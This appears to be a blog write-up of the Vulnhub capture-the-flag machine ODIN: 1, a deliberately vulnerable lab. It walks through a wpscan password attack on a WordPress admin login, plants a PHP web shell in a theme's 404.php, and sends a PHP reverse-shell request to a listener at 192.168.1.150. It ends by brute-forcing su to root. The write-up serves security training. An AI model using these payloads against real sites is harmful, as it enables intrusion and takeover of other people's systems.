Vulnhub - ODIN: 1
Introduction
Difficulty: Easy
Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from it, asked him to sacrifice his left eye, this being a symbol of his will to obtain knowledge
This is ODIN: 1 from Vulnhub.
Ports
HTTP only.
HTTP
It says:
vikingarmy
Just another Joomla site
But that’s a little joke because it’s actually wordpress.
root@kali:/opt/vulnhub/odin# wpscan -e --url http://odin
wp-scan only finds a user called ‘odin’, but trying to login at wp-admin with any random password gives an error:
Unknown username. Check again or try your email address.
So that’s curious. What if we try admin?
Error: The password you entered for the username admin is incorrect
Right. So admin exists; odin does not. What’s up with that, wp-scan? Lol.
We also have some encoded strings on the blog:
NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC 63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTU MFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===
This is base32:
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist
We have this:
SWYgeW91IGxvb2sgY2xvc2VseSwgeW91IHdvbid0IG5lZWQgaXQgaGVyZQo=
Which is base64:
If you look closely, you won’t need it here
And this:
++++++++++[>+>+++>+++++++>++++++++++««-]»»++++++++++.+.+++++.————.+.+++++.——-.
Which appears to be brainf^%k, which translates to:
nottuzy
Which never appears to be useful.
So a password attack on admin? Yes.
root@kali:/opt/vulnhub/odin# wpscan -U admin -P /usr/share/wordlists/rockyou.txt --url http://odin
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / qwerty
Trying admin / ashley Time: 00:00:03 < > (20 / 14344412) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: qwertywp-admin
One of the blog posts is called:
Twenty Twenty: 404 Template (404.php)
Wonder if that is a hint?
We can edit the file here:
http://odin/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty
And add:
<?php system($_GET['cmd']);?>
into the upper part of the file beneath the opening html tag. We can then access the file at:
http://odin/wp-content/themes/twentytwenty/404.php?cmd=id
And issue commands. Like a shell. Like this:
GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.150",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
On the box
We can login to mysql with joomla:joomla and grab some hashes but they don’t want to break easily, but there is a shortcut here. Linpeas has a mode (-a) that will brute force su. And we have weak passwords:
[+] Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds
Bruteforcing user root...
You can login as root using password: jasmine
Bruteforcing user osboxes...
Bruteforcing user voldemort...
Bruteforcing user rockyou...
You can login as rockyou using password: rockyouSo really that’s it; let’s check it:
rockyou@osboxes:~$ su root
su root
Password: jasmine
root@osboxes:/home/rockyou#
root@osboxes:/home/osboxes# cd /root
cd /root
root@osboxes:~# ls -lash
ls -lash
total 48K
4.0K drwx------ 7 root root 4.0K Dec 16 03:24 .
4.0K drwxr-xr-x 23 root root 4.0K Jul 5 22:43 ..
4.0K drwx------ 2 root root 4.0K Jun 24 17:24 .aptitude
4.0K -rw------- 1 root root 1 Dec 4 15:57 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
4.0K -rw-r--r-- 1 root root 109 Dec 5 08:34 bjorn
4.0K drwx------ 6 root root 4.0K Dec 4 15:36 .cache
4.0K drwx------ 3 root root 4.0K Dec 4 15:36 .config
4.0K drwx------ 3 root root 4.0K Dec 4 15:36 .dbus
4.0K drwx------ 3 root root 4.0K Dec 4 15:36 .local
4.0K -rw-r--r-- 1 root root 161 Dec 5 2019 .profile
4.0K -rw-r----- 1 root root 4 Dec 16 03:24 .vboxclient-display-svga.pid
root@osboxes:~# file bjorn
file bjorn
bjorn: UTF-8 Unicode text
root@osboxes:~# cat bjorn
cat bjorn
cσηgяαтυℓαтιση
Have a nice day!
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=
root@osboxes:~# echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=' | base64 -d
<ViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=' | base64 -d
https://www.youtube.com/watch?v=VhkfnPVQyaY
root@osboxes:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
osboxes
root@osboxes:~#